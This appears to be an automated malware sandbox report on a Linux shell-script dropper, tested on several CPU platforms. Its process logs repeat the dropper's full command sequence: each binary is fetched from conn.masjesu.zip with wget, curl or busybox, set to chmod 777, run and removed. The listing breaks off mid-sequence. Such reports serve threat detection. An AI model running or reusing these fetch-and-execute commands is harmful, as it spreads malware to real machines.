Analysis Overview
SHA256
754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a
Threat Level: Shows suspicious behavior
The file 754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
File and Directory Permissions Modification
Checks CPU configuration
Writes file to tmp directory
System Network Configuration Discovery
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-29 02:30
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-29 02:30
Reported
2024-10-29 02:33
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
149s
Max time network
132s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh
[/tmp/754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 151.101.193.91:443 | tcp | |
| GB | 89.187.167.8:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.61:443 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-29 02:30
Reported
2024-10-29 02:32
Platform
debian9-armhf-20240611-en
Max time kernel
148s
Max time network
3s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh
[/tmp/754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-29 02:30
Reported
2024-10-29 02:32
Platform
debian9-mipsbe-20240611-en
Max time kernel
79s
Max time network
81s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA | /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA | N/A |
| N/A | /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ | /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ | N/A |
| N/A | /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F | /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F | N/A |
| N/A | /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw | /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw | N/A |
| N/A | /tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3 | /tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3 | N/A |
| N/A | /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP | /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP | N/A |
| N/A | /tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q | /tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q | N/A |
| N/A | /tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB | /tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB | N/A |
| N/A | /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 | /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 | N/A |
| N/A | /tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em | /tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em | N/A |
| N/A | /tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ | /tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ | N/A |
| N/A | /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx | /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx | N/A |
| N/A | /tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD | /tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD | N/A |
| N/A | /tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l | /tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l | N/A |
| N/A | /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA | /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA | N/A |
| N/A | /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ | /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ | N/A |
| N/A | /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F | /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F | N/A |
| N/A | /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw | /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw | N/A |
| N/A | /tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3 | /tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3 | N/A |
| N/A | /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP | /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP | N/A |
| N/A | /tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q | /tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q | N/A |
| N/A | /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx | /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx | N/A |
| N/A | /tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD | /tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD | N/A |
| N/A | /tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l | /tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l | N/A |
| N/A | /tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB | /tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB | N/A |
| N/A | /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 | /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 | N/A |
| N/A | /tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em | /tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em | N/A |
| N/A | /tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ | /tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD | /usr/bin/curl | N/A |
Processes
/tmp/754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh
[/tmp/754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]
/bin/chmod
[chmod 777 QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]
/tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA
[./QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]
/bin/rm
[rm QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]
/bin/chmod
[chmod 777 BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]
/tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ
[./BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]
/bin/rm
[rm BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]
/bin/chmod
[chmod 777 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]
/tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F
[./37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]
/bin/rm
[rm 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]
/bin/chmod
[chmod 777 VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]
/tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw
[./VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]
/bin/rm
[rm VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3]
/bin/chmod
[chmod 777 fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3]
/tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3
[./fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3]
/bin/rm
[rm fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP]
/bin/chmod
[chmod 777 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP]
/tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP
[./5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP]
/bin/rm
[rm 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q]
/bin/chmod
[chmod 777 NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q]
/tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q
[./NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q]
/bin/rm
[rm NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB]
/bin/chmod
[chmod 777 HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB]
/tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB
[./HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB]
/bin/rm
[rm HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6]
/bin/chmod
[chmod 777 gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6]
/tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6
[./gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6]
/bin/rm
[rm gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em]
/bin/chmod
[chmod 777 Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em]
/tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em
[./Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em]
/bin/rm
[rm Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ]
/bin/chmod
[chmod 777 hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ]
/tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ
[./hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ]
/bin/rm
[rm hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx]
/bin/chmod
[chmod 777 XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx]
/tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx
[./XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx]
/bin/rm
[rm XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD]
/bin/chmod
[chmod 777 nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD]
/tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD
[./nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD]
/bin/rm
[rm nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l]
/bin/chmod
[chmod 777 DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l]
/tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l
[./DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l]
/bin/rm
[rm DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]
/bin/chmod
[chmod 777 QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]
/tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA
[./QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]
/bin/rm
[rm QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]
/bin/chmod
